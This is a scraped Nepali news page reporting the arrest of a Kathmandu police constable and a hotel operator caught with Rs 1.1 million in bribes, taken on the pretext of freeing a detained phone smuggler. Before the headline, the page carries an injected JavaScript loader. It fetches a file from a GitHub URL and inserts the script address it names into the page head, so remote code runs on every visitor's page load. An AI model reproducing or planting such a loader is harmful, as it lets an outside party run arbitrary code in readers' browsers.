;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); लिखु तामाकोशीका श्रेष्ठलाई छुटाइदिने बहानामा घुस लिने बानेश्वर प्रहरी वृत्तकी हवल्दार ११ लाख घुससहित पक्राउ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • लिखु तामाकोशीका श्रेष्ठलाई छुटाइदिने बहानामा घुस लिने बानेश्वर प्रहरी वृत्तकी हवल्दार ११ लाख घुससहित पक्राउ
दुर्घटना/अपराध

लिखु तामाकोशीका श्रेष्ठलाई छुटाइदिने बहानामा घुस लिने बानेश्वर प्रहरी वृत्तकी हवल्दार ११ लाख घुससहित पक्राउ

रामेछाप लिखु तामाकोशी गाउँपालिका घर भएका मिलन श्रेष्ठ गौरीघाटस्थित संगम चोकबाट १ सय ६७ थान मोवाइलसहित पक्राउ

फागुन २४,
काठमाडौं । महानगरीय प्रहरी वृत्त नयाँ बानेश्वरमा कार्यरत महिला हवल्दार ताराकुमारी श्रेष्ठलाई अख्तियारले पक्राउ गरेको छ । अख्तियार दुरुपयोग अनुसन्धान आयोगको टोलीले हवल्दार श्रेष्ठसहित अर्का एक जनालाई त्रिभुवन विमानस्थलबाट पक्राउ गरेको हो । हवल्दारसँगै पक्राउ पर्नेमा होटल सञ्चालक अनिश जोशी छन् ।

उनीहरुको साथबाट ११ लाख घुस रकम बरामद गरिएको अख्तियारका सहायक प्रवक्ता बेदप्रसाद भण्डारीले बताए । भन्सार चोरी, निकासीको आरोपमा गौशाला प्रहरीको हिरासतमा रहेका थुनुवालाई छुटाउँछु भनेर उनीहरुले घुस लिएका थिए ।

माघ १७ मा रामेछाप लिखु तामाकोशी गाउँपालिका घर भएका मिलन श्रेष्ठ गौरीघाटस्थित संगम चोकबाट १ सय ६७ थान मोवाइलसहित पक्राउ परेका थिए । त्रिभुवन विमानस्थल भन्सार कार्यालय गौचरणले उनलाई गौशाला प्रहरीको हिरासतमा राखेर अनुसन्धान गरिरहेको थियो । मिलनलाई छुटाइदिन्छु भनेर उनीहरुले घुस मागेका हुन् ।

भारतबाट बा १८ च ७५११ नम्बरको गाडीमा भन्सार छलेर ल्याएको मोवाइल प्रहरीले बरामद गरेर भन्सार कार्यालयलाई बुझाएको थियो । सो मुद्दामा त्रिभुवन विमानस्थल भन्सार कार्यालयले अनुसन्धान गरिरहेको थियो ।

 

फेसबुक प्रतिक्रियाहरु